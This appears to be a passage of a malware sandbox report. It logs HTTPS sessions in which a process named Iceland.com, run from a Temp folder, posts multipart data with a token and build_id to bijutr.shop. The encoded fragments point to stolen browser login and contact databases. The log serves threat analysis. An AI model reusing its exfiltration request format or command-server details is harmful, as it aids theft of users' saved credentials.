2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49840	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:08 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WL68Q90R9H47QI5FKFUK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:08 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 Data Ascii: ------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------WL68Q90R9H47QI5FKFUKCont
2024-12-27 06:10:08 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:08 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:08 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49846	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:10 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Y5XTR16XLN7YMY58GD2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 Data Ascii: ------8Y5XTR16XLN7YMY58GD2Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------8Y5XTR16XLN7YMY58GD2Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------8Y5XTR16XLN7YMY58GD2Cont
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
